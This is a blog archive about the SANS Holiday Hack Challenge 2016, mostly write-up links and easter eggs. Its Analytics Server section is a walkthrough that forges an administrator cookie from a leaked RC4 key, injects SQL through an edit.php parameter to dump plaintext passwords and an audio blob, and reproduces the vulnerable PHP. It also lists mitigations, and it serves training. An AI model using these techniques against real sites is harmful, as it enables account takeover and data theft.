Friday, January 6, 2017

SANS Holiday Hack 2016: Awesome Write-Ups!

I read other write-ups to learn from.  People solve things in different ways.  I decided to find some other solutions and post them here, because they may help others.

https://research.kudelskisecurity.com/2017/01/06/sans-holiday-hack-challenge-2016/
http://holiday.ctf.rip/
http://l4m3rs.blogspot.com/2017/01/sans-holiday-hack-challenge-2016-santas.html
http://shhc2016.r00k.io/
http://mickeycecil.com/hackology/hh16/
http://ropgadget.com/posts/sansholidayhack_2016.html
http://ist.uwaterloo.ca/~jatestar/SANSHolidayHack2016-TESTART.pdf
http://braindiff.net/blog/sans-2016-write-up/
https://vulnsec.com/2017/SANS-Holiday-Hack-Challenge-2016/
https://reedphish.wordpress.com/2017/01/05/writeup-the-2016-sans-holiday-hack-challenge/
https://blog.ropnop.com/sans-holiday-hack-2016-writeup/
https://www.merckedsecurity.com/sans-holiday-hack-challenge-2016/
http://hypn.za.net/sans2016holidayhack/
https://techanarchy.net/2017/01/solving-the-sans-2016-holiday-hack-challenge/

Thursday, January 5, 2017

SANS Holiday Hack 2016-Extras

Extras:

The coins are silver/grey with a dark grey “W”.  Does the “W” stand for “Wars” or does the creator have an ad deal with Webroot?  Webroot is an antimalware product.  Their symbol is a green circle with a dark green “W”.  (The writer is kidding, obviously, but if you haven’t considered that, maybe you should, now?)

Santa W. Claus-wondered what the W stood for.  Maybe it’s in reference to Wodan-a German God that resembles Santa Claus.

Some of the achievements have references to pop culture:

1.21 Gigawatts is how many gigawatts are needed to power the Delorean in the Back To The Future movies.
Chess? References the movie WarGames.
The One Who Knocks is a common quote from Breaking Bad.  The founder of Counter Hack, Mr. Skoudis, is said to resemble the main character of Breaking Bad.

In the last two years of Holiday Hack Challenges, the phrase “Who is the villain.” was used.  The writer thought that it was a typo.  It wasn’t.  It was a not-so-subtle clue about who the villains are.

Is Dr. Who from Whoville?  Are Dr. Who and Cindy Lou Who related?  Are they the heads of a crime family.  Picturing the Who mob. :)  Is the speck actually a space ship that has a slight miscalculation of scale with Earth, like in Hitchhiker’s Guide to the Galaxy?

1978

Elf House 1

The fireplace secret room refers to the secret room in Counter Hack.

Elf House 2-Room 2

There is a 1977 Star Wars poster in his room depicting Darth Vader’s helmet behind Luke, who is holding a lightsaber to the sky, & Leia, C3PO, and R2D2.  The Death Star is to the left of the helmet, and X-Wings are moving into attack configuration to the left of the Death Star.

There is a talking plant on the top right side.

The Big Tree

Tom Hessman was born after 1978.  He isn’t living in his house yet in 1978.  The Big Tree is a nod to Legend of Zelda:Ocarina of Time where the main character, Link, lives in a tree surrounded by elves.  Have you found the Master Sword, yet, Mr. Hessman?

North Pole

The sign in the North Pole stating, “4351 Days Since the Last Grinch Level Event”, is in reference to when “The Grinch Who Stole Christmas” movie was released.  In 1978, it had been ~12 years since the Grinch terrorized the citizens of Whoville.  Did they calculate for leap year days?  (Yes, they did. :))  The Grinch Who Stole Christmas was released December 18th, 1966. 


There actually is a Music Discombobulator.  Seriously, search Google for it. :)

The placement of the homes and the Christmas tree in the North Pole reminds the writer of WhoVille.

Someone had an accident near Bushy Evergreen-or, Bushy had an accident.  Don’t imbibe amber, frozen Dihydrogen Monoxide.

NetWars Experience Treehouse

NetWars sure has come a long way.  The elves were playing Tic-Tac-Toe and Space Invaders.

Santa’s Office

There is a tiny TARDIS police call box on his table.  A clue about who the villain is.  This office actually looks similar to the Counter Hack Office.  The tiny TARDIS isn’t on his desk in the pictures of Counter Hack, though.  (The writer has learned that Mr. Skoudis now has a tiny TARDIS on his desk. :))

Small Treehouse

Minty Candycane is singing, “We Will Rock You” by Queen

The Corridor

Is either a nod to a strange 1970 movie short called Corridor about a man who is stuck in a corridor, forever chasing after a woman that he’ll never get to.  Or, it is a nod to the 2010 movie “The Corridor.  Or, maybe it’s both?

The Clock Tower

It’s the inside of the Clock Tower in the Back to the Future series of movies.

All Over The North Pole

The 1978 elves have cute references to the things that they are studying in 2016.

Holly Evergreen:  “My aunt just gave me her famous Cran Pie recipe, which seems simple - there are only five ingredients!  But I don’t understand these instructions.  What do you mean the heat sinks?”

SugerPlum Mary:  “So, I was talking with Minty about how much I wish Santa would take me on deliveries.  I’d get to travel, to see the world, you know?  Shinny interrupts and starts going on and on about how GREAT the North Pole is, there’s so much to DO here, why would anyone want to leave and all that.  I said, “Shinny, look - everyone’s getting sick of your Localphile Intrustions.”

Alabaster Snow:  “Hey, have you seen ‘Animal House’?  What a riot.  Those guys sure know how to have fun, but it’s not exactly RESTful, eh?

Sparkle Redberry apparently doesn’t exist in 1978, yet.

Wunorse Openslae:  “It’s the weirdest thing - I keep getting Christmas cards in the mail.  No return address, just initials: S.D.  I don’t recognize the initials, so these SD cards are a mystery.

Minty Candycane:  “Buddy, you’re an old man poor man - pleadin’ with your eyes, gonna make you some peace some day… What?  Oh, sorry, I’ve just had that song stuck in my head all day.”

Pepper Minstix:  “Hey, I just noticed my cursive changes drastically when I’ve had a lot of coffee.  It gets a little more dynamic and harder to interpret.  Does your handwriting have a distinct Javascript, too?”

Shinny Upatree:  “Did you know I auditioned to play C3PO in Star Wars?  I tried out and completed their whole Android Application Package and everything.  I really thought I had a chance, but I got zip.”

2016

Elf House 2-Room 2

There is a new poster in the room.  It is a 2015 poster for Star Wars Episode 7, depicting the symbol for the Rebel Alliance.

North Pole

On December 24th, 2016, the sign depicting “Days Since Last Grinch Level Event returns to 0.  The story line originally starts December 24th.  So the character starting before December 24th is a little confusing.  Time travel, eh?

Santa’s Workshop

Why is Jason a hay bale?  Jason obviously didn’t exist in 1978 either.  There’s no talking hay bale in ’78.

Why does the middle reindeer moo?

Why are there only 5 reindeer in the game that we see?  There are some mentioned in the SantaGram.apk.  Why were they leaving?  Where is Rudolph?

Why aren’t the 3 reindeer in Santa’s workshop in DFER?  Maybe they are members of Rudolph’s Red Team instead?

Why is there an elf hat on the crane?

Santa’s Workshop Train Station

When a person looks at the STATUS command, they see a nod to the movie Back To The Future.  The top speed is 88 mph.  The Flux Capacitor is Fluxing.  When they activate the train, they’ll see a screen similar to the console on back to the future.  

Analytics Server

Has an ad that says, “Anyone reading this?”

Dungeon Game:

If one reads the engravings in the living room, it says, “This space intentionally left blank.  The implementers blame Mike Poor.” 

The dome room has a description of “elvish hacking rites”. 

Cranberry Pi Device:

In the Cranberry Pi device, there is a support website listed.  It is an actual website that says that Cranbian is the superior fruit operating system.

There are recipes that utilize cranberries as an ingredient in the device as well.

SantaGram APK

When Pepper Minstix is playing Dungeon, she decides to kick the mailbox and post about it on the SantaGram apk.
The elves seem to have an obsession with the beautiful landscape of the North Pole and animals living around the north pole-reindeer, polar bears, and white foxes.

Songs-Thanks Ninjula, these are awesome!

North Pole

Sleigh Ride

NetWars Tree House

Plump Sugar Fairies

Elf House 1 & Elf House 2

We Three Kings

North Pole-Train Station

Coming To Tizown

Small Treehouse
Driedel, Driedel, Driedel

DFER/Santa’s Workshop

Boogie Woogie Santa Claus

Santa’s Office/The Corridor/The Clock Tower

No songs.  Eerie silence.

SANS Holiday Hack 2016-Resources

Resources:

1  https://quest2016.holidayhackchallenge.com

2  SANS Pen Testing Blog:  Title:  Mining Android Secrets (Decoding Android App Resources), Author:  Jeff McJunkin,

3  SANS Pen Testing Blog:  Title:  Ghost In The Droid: Reverse Engineering Android Apps, Author:  Joshua Wright

4  YouTube:  SANS Pen Test- How To’s: Manipulating Android Applications, Presenter:  Joshua Wright
https://www.youtube.com/watch?v=mo2yZVRicW0


6  https://developer.android.com/studio/index.html


8  https://github.com/skylot/jadx


10 SANS Pen Testing Blog: Title:  Mount A Raspberry Pi File System Image, Author:  Joshua Wright

11 https://en.wikipedia.org/wiki/Zork

12 SANS Pen Test Blog: Title:  Mining Meteor, Author: Tim Medin


14 http://php.net/manual/en/wrappers.php.php

15 https://mariadb.org/learn/

As always, Google.

SANS Holiday Hack 2016-Audio File Puzzle

Audio File Puzzle

Tool:

Audacity

Operating System:

Windows 10

Each file was opened in Audacity.  The tempo was adjusted until the word or phrase could properly be heard.  

Select the Effect option on the menu at the top of the screen.  Select the Change Tempo option.  Manipulate the audio file by either, putting a number in one of the fields, or sliding the slide bar.  One can preview the sound by pressing the preview button.  If one clicks the OK button, they can still change it back by pressing the Edit option on the menu at the top of the screen and clicking undo.

Then the pitch was adjusted.  

Select the Effect option on the menu at the top of the screen.  Select the Change Pitch option.  This one is a little more complicated.  Adjust the pitch by changing the number in the elevator button, changing the key, changing the number in the text box, and sliding the slide bar.  The best way to learn is trial and error.  Again, one can preview the sound by pressing the preview button.  If one clicks the OK button, they can still change it back by pressing the Edit option on the menu at the top of the screen and clicking undo.

The speed was not manipulated because if one speed up the track, even a little bit, the pitch was a lot different.  It had a Chipmunk kind of sound.  It seemed easier to adjust the speed and pitch separately.

Then the files were combined.  Open the first file.  Then open the 2nd file.  In the 2nd file, click the Edit option on the menu at the top of the screen, select the Select option, then Select All from the drop down menu that appears. Copy the 2nd file using the little icon that looks like two papers.  Close the 2nd file.  Click back on the 1st screen.  Go the the end of the first audio, click the end to move the marker to the end, make sure that nothing is selected, then click the little icon that looks like a clipboard and a paper.  Repeat for the remaining audio files, opening each one up, copying them, closing them, and pasting them to the end of the 1st audio file screen in Audacity.  Make sure that they are in order 1>2>3>4>5>6>7.

The writer did not have much luck.  Unfortunately, the first and second audio files were tough to change.  Too slow or fast, and the phrase couldn’t be heard.  The first couple of audio files sound odd.  However, the last five sound ok.  They were manipulated enough to solve the puzzle.

Catching the Villain:

The player should log into the game at quest2016.holidayhackchallenge.com, go to the door without a terminal in The Corridor room, and type the entire phrase and punctuation, “Father Christmas, Santa Claus, or as I’ve always known him, Jeff.” into the password prompt.  The door opens.  There is a long ladder that leads up to a clock tower.  Who is standing there?  Dr. Who, of course.  He apparently didn’t like the 1978 Star Wars Holiday Special. XD

SANS Holiday Hack 2016-Analytics Server: Part Two

Analytics Server (Part 2)

Scan the https://analytics.northpolewonderland.com server with map, it finds that there is a git repository that is world readable, located at https://analytics.northpolewonderland.com/.git/.

nmap -T4 -sC analytics.northpolewonderland.com -p 0-65535

Download the whole git repository to a computer; there is source code for each the functions on the website.

The login.php has an easily reverse engineered cookie.  

    $auth = encrypt(json_encode([ //JSON encode and call the encrypt function for the following
      'username' => $_POST['username'],
      'date' => date(DateTime::ISO8601),
    //This is just the username and Date/Time. :D
    ])); 

    setcookie('AUTH', bin2hex($auth));  //change the binary of the variable $auth to hexadecimal, set cookie to this 
    value.

The crypto calculation is in crypto.php which is available in the .git directory as well.  The key is stored as a variable in crypto.php, This is the crypto code:

<?php
  define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

  function encrypt($data) {
    return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
  }

  function decrypt($data) {
    return mcrypt_decrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
  }
?>

Slightly change the login code, to spit out the value that the administrator cookie would be.

<?php
  define('KEY', "\x61\x17\xa4\x95\xbf\x3d\xd7\xcd\x2e\x0d\x8b\xcb\x9f\x79\xe1\xdc");

  function encrypt($data) {
    return mcrypt_encrypt(MCRYPT_ARCFOUR, KEY, $data, 'stream');
  }

     $auth = encrypt(json_encode([
      'username' => $_POST['administrator'],
      'date' => date(DateTime::ISO8601),
    ]));

   $auth = bin2hex($auth));
   print $auth
?>

Use an offline/online IDE to see the print statement.  If you have php on a Linux box, you can run it on there to see what happens.  The administrator cookie is:  
82532b2136348aaa1fa7dd2243dc0dc1e10948231f339e5edd5770daf9eef18a4384f6e7bca04d86e573b965cc9b654ab1494d6763a10a65b71176884152.

After getting the cookie; add a cookie for the analytics website.  There is a plugin called “Cookies Manager+” in Firefox.  After manipulating the cookie in “Cookies Manager+”, navigate to the website, and be magically logged in as administrator.  That is called session cookie stealing.

There are three areas of interest on the site.  “Query”, “View”, and “Edit”.   

“Query” queries the database based on certain parameters, and displays those parameters to the screen.  There is also an option to save a report to view later on the “Query” screen. This saves the results of the query to the query column in the database.
“View” allows a person to view a previously saved query/report. 
"Edit” allows one to change the name and description of a report.  
“Query” and “View” didn’t initially appear to be vulnerable to SQL Injection because of the way that the queries are made in the programs that are executed to display the database query and reports to the screen:  query.php and view.php.  

The edit.php program, the program used to edit the name and description of reports on the “Edit” page, did have a weakness.  It has four parameters: “query”, “id”, “name”, and “description”.  The “query” parameter could be manipulated.

In order to use the “Edit” area of the website, one must already have a “report ID”.  

The “report ID” can be obtained by querying something on the “Query” area of the website, and clicking the “Save as report” checkbox.  The report ID is displayed on the screen for someone to view later, using the “View” area of the website or edit later using the “Edit” part of the website. 

Copy the report ID.  Navigate to the “Edit” area of the website.  Capture the network traffic.  In this case, Developer Tools on Firefox was used.  “Edit” the report that was just queried. Paste the report ID into the report ID text box, pick any name and type it into the name textbox, then type a description and put it into the description part. 

In the captured traffic, manipulate the query parameter to “SELECT%20*%20FROM%20audio”.  (It's url encoded because the query is being made in the address bar.)  That query is placed into the database in the “query” column, along with the id, name, and description.  In order to see that “SELECT%20*%20FROM%20audio” query in action, one has to view the edited report ID.

If one navigates to the “View” area of the website, and puts in the report ID that was manipulated in the “Edit” area of the website, it shows all the files in the audio database because the view.php program “sees” the “SELECT%20*%20FROM%20audio” query in the query part of the report database and executes it as an sql query.

So I didn't explain this well when I submitted my write-up-the query column where id = the report id  in the reports database is what is being manipulated.  The programmer failed to catch any queries that didn't fit what he/she intended.  The programmer should not have gotten everything from that row.  Should have been SELECT id, name, description FROM reports, that way that the query couldn't be manipulated.  Then every item in that grouping should be escaped & sanitized, not just the id.  Seen this where the programmer was trying to save a few lines of code.  That SELECT * FROM audio overwrites the original results in the query column.  Then the view.php interprets it as SQL.  

One can see both audio files because the “SELECT%20*%20FROM%20audio” query selects every audio file in the database.  When working with a real database, one may not want to do this particular query because it returns every record in the database.  It depends on one’s goals.  

If the query is manipulated, by doing the above steps, to “SELECT%20*%20FROM%20users”, one can get the all of the usernames and passwords.  The usernames and passwords happen to be stored plain text.  The administrator password is KeepWatchingTheSkies. 

To get the audio file out of the database.  There are different ways.  In this case, the easiest solution seemed to be to base64 encode the file.  (The file blob was stored in the database in a column called, “mp3”.)  Manipulate the query by taking the same steps as above, except, change the query to SELECT%20TO_BASE64(mp3)%20FROM%20audio%20WHERE%20id%20%3D%20%273746d987-b8b1-11e6-89e1-42010af00008%27 

Navigate to the “View” area of the website and the discombobulatedaudio7.mp3 file is displayed on the screen in base64. 

Select all of the text in the TO_BASE64(mp3) display box-not everything on the screen.  Then paste that text into a text editor and save it as base64encodedmp3.  Note:  There is no period.  The mp3 isn’t decoded yet, so it can’t be played. 

There are different methods of decoding a base64 file.  For some reason “base64 -d” did not like this base64 encoding.  In this case, python was used.  The command is python -c ‘print open (“base64encodedmp3”, “rb”).read().decode(“base64”)’ > discombobulatedaudio7.mp3.  The mp3 should now be playable.

Mitigation:

Don’t allow public access to git a repository.
Don’t store keys/credentials in variables in a program.
Don’t have a cookie algorithm that is easy to reverse engineer-ie don’t use a proprietary algorithm to calculate a cookie-use known/trusted solutions to calculate a cookie value.
Don’t allow anyone to have access to experimental pages-except the people who are developing them.
Php mysql_escape_string doesn’t replace properly validating input.  It has been deprecated and only protects against \x00 (null character), \n (line feed character), \r (carriage return character), \, ', " and \x1a (EOF).  It does not protect against the more creative people that find other ways to input those characters.  The creator of these php programs should read the php website, the MariaDB website, and OWASP to keep track of up-to-date secure programming advice.  Currently, best practice is prepared queries.  
Restrict access from one database to another.
Restrict access to certain database functions from the website.
Don’t store passwords plain-text.

edit.php

<?php
  # This should be the first require
  require_once('this_is_html.php');
  require_once('db.php');

  # Don't allow anybody to access this page (yet!)
  restrict_page_to_users($db, []);

  require_once('header.php');

  if(!isset($_GET['id'])) {
?>
    <div class="alert alert-warning"><strong>Warning!</strong> This is experimental.</div>
    <form class="form-horizontal">
      <div class="form-group">
        <label for="id" class="col-sm-2 control-label">ID</label>
        <div class="col-sm-6">
          <input type="text" class="form-control" name="id" id="id" placeholder="XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX">
        </div>
      </div>
      <div class="form-group">
        <label for="name" class="col-sm-2 control-label">Name</label>
        <div class="col-sm-6">
          <input type="text" class="form-control" name="name" id="name" placeholder="New Name">
        </div>
      </div>
      <div class="form-group">
        <label for="description" class="col-sm-2 control-label">Description</label>
        <div class="col-sm-6">
          <input type="text" class="form-control" name="description" id="description" placeholder="New Description">
        </div>
      </div>
      <div class="form-group">
        <div class="col-sm-offset-2 col-sm-6">
          <button type="submit" class="btn btn-default">Edit</button>
        </div>
      </div>
    </form>

<?php
  }
  else
  {
    $result = mysqli_query($db, "SELECT * FROM `reports` WHERE `id`='" . mysqli_real_escape_string($db, $_GET['id']) . "' LIMIT 0, 1”); # looks for existing report id, selects all items in the row, including the query.
    if(!$result) {
      reply(500, "MySQL Error: " . mysqli_error($db));  # if it can’t find the id or the query is invalid, an error 
      message is displayed to the page.
      die();
    }
    $row = mysqli_fetch_assoc($result);

    # Update the row with the new values
    $set = [];
    foreach($row as $name => $value) {
      print "Checking for " . htmlentities($name) . "...<br>";
      if(isset($_GET[$name])) {
        print 'Yup!<br>';
        $set[] = "`$name`='" . mysqli_real_escape_string($db, $_GET[$name]) . “'"; # places the value of $name in 
        $set variable
      }
    }

    $query = "UPDATE `reports` " .
      "SET " . join($set, ', ') . ' ' .
      "WHERE `id`='" . mysqli_real_escape_string($db, $_REQUEST['id']) . "'";
    print htmlentities($query); #update reports set <name from form> where id = <id from form>

    $result = mysqli_query($db, $query); # the value of query in the “report” database can be changed here-by 
    manipulating the query parameter in the web request.  Notice this isn’t being escaped &/or sanitized.
    if(!$result) {
      reply(500, "SQL error: " . mysqli_error($db));
      die();
    }

    print "Update complete!";
  }
?>
<?php require_once('footer.php'); ?>

view.php

<?php
  # This should be the first require
  require_once('this_is_html.php');
  require_once('db.php');

  restrict_page_to_users($db, ['guest']);

  require_once('header.php');

?> 
  <form class="form-inline">
    <div class="form-group">
      <label for="id" class="h3">Query UUID</label>
      <input type="text" class="form-control input-lg" style="width: 40rem" id="id" name="id" placeholder="XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX">
      <button type="submit" class="btn btn-primary">View</button>
    </div>
  </form>
  <br/>
<?php

  if(isset($_GET['id'])) {
    $result = mysqli_query($db, "SELECT * FROM `reports` WHERE `id`='" . mysqli_real_escape_string($db, $_GET['id']) . "' LIMIT 0, 1”);  --It gets everything from reports, including the query column of the report database, where the id matches the manipulated query.
    if(!$result) {
      reply(500, "MySQL Error: " . mysqli_error($db));
      die();
    }

    $row = mysqli_fetch_assoc($result);
    if(!$row) {
      reply(404, "Report not found!");
      die();
    }
?>
  <!--
  <ul>
    <li>ID: <?= htmlentities($row['id']); ?></li>
    <li>Name: <?= htmlentities($row['name']); ?></li>
    <li>Description: <?= htmlentities($row['description']); ?></li>
  </ul>
  -->
  <div class="panel panel-primary">
    <div class="panel-heading">
      <h3 class="panel-title">Details</h3>
    </div>
    <div class="panel-body">
      <div class="row">
        <div class="col-xs-2 col-sm-2 text-muted text-right">ID</div>
        <div class="col-xs-8 col-sm-9"><?= htmlentities($row['id']); ?></div>
      </div>
      <div class="row">
        <div class="col-xs-2 col-sm-2 text-muted text-right">Name</div>
        <div class="col-xs-8 col-sm-9"><?= htmlentities($row['name']); ?></div>
      </div>
      <div class="row">
        <div class="col-xs-2 col-sm-2 text-muted text-right">Details</div>
        <div class="col-xs-8 col-sm-9"><?= htmlentities($row['description']); ?></div>
      </div>
    </div>
  </div>

  <?php
    format_sql(query($db, $row[‘query']));  --The value in the query column of the report database, where the id that was manipulated is selected, is then interpreted as sql.  The query isn’t sanitized before being put in here.
  }
require_once('footer.php'); 
?>

Here is the relevant database information:

sprusage.sql

-- MySQL dump 10.13  Distrib 5.7.16, for Linux (x86_64)
--
-- Host: localhost    Database: sprusage
-- ------------------------------------------------------
-- Server version 5.7.11-0ubuntu6

/*!40101 SET @OLD_CHARACTER_SET_CLIENT=@@CHARACTER_SET_CLIENT */;
/*!40101 SET @OLD_CHARACTER_SET_RESULTS=@@CHARACTER_SET_RESULTS */;
/*!40101 SET @OLD_COLLATION_CONNECTION=@@COLLATION_CONNECTION */;
/*!40101 SET NAMES utf8 */;
/*!40103 SET @OLD_TIME_ZONE=@@TIME_ZONE */;
/*!40103 SET TIME_ZONE='+00:00' */;
/*!40014 SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0 */;
/*!40014 SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0 */;
/*!40101 SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='NO_AUTO_VALUE_ON_ZERO' */;
/*!40111 SET @OLD_SQL_NOTES=@@SQL_NOTES, SQL_NOTES=0 */;

--
-- Table structure for table `reports` --database table being manipulated by edit.php
--

DROP TABLE IF EXISTS `reports`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `reports` (
  `id` varchar(36) NOT NULL,
  `name` varchar(64) NOT NULL,
  `description` text,
  `query` text NOT NULL, --query column in database, this is the column being manipulated by the edit.php   
   program when an extra parameter is added.
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `reports`
--

LOCK TABLES `reports` WRITE;
/*!40000 ALTER TABLE `reports` DISABLE KEYS */;
/*!40000 ALTER TABLE `reports` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `users`
--

DROP TABLE IF EXISTS `users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `users` (
  `uid` int(11) NOT NULL,
  `username` varchar(128) NOT NULL,
  `password` varchar(128) NOT NULL,
  PRIMARY KEY (`uid`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

DROP TABLE IF EXISTS `audio`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `audio` (
  `id` varchar(36) NOT NULL,
  `username` varchar(32) NOT NULL,
  `filename` varchar(32) NOT NULL,
  `mp3` MEDIUMBLOB NOT NULL, --can be base64 encoded and exfiltrated
  PRIMARY KEY (`id`)
) ENGINE=InnoDB DEFAULT CHARSET=latin1;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `users` --The passwords were stored plain text.
--

LOCK TABLES `users` WRITE;
/*!40000 ALTER TABLE `users` DISABLE KEYS */;
/*!40000 ALTER TABLE `users` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;

/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;

-- Dump completed on 2016-11-21 20:57:13

GRANT SELECT, INSERT, UPDATE ON `sprusage`.`reports` TO 'sprusage'@'localhost';
GRANT SELECT, INSERT, UPDATE ON `sprusage`.`app_launch_reports` TO 'sprusage'@'localhost';
GRANT SELECT, INSERT, UPDATE ON `sprusage`.`app_usage_reports` TO 'sprusage'@'localhost;
GRANT SELECT ON `sprusage`.`users` TO 'sprusage'@'localhost';

GRANT SELECT ON `sprusage`.`audio` TO 'sprusage'@'localhost';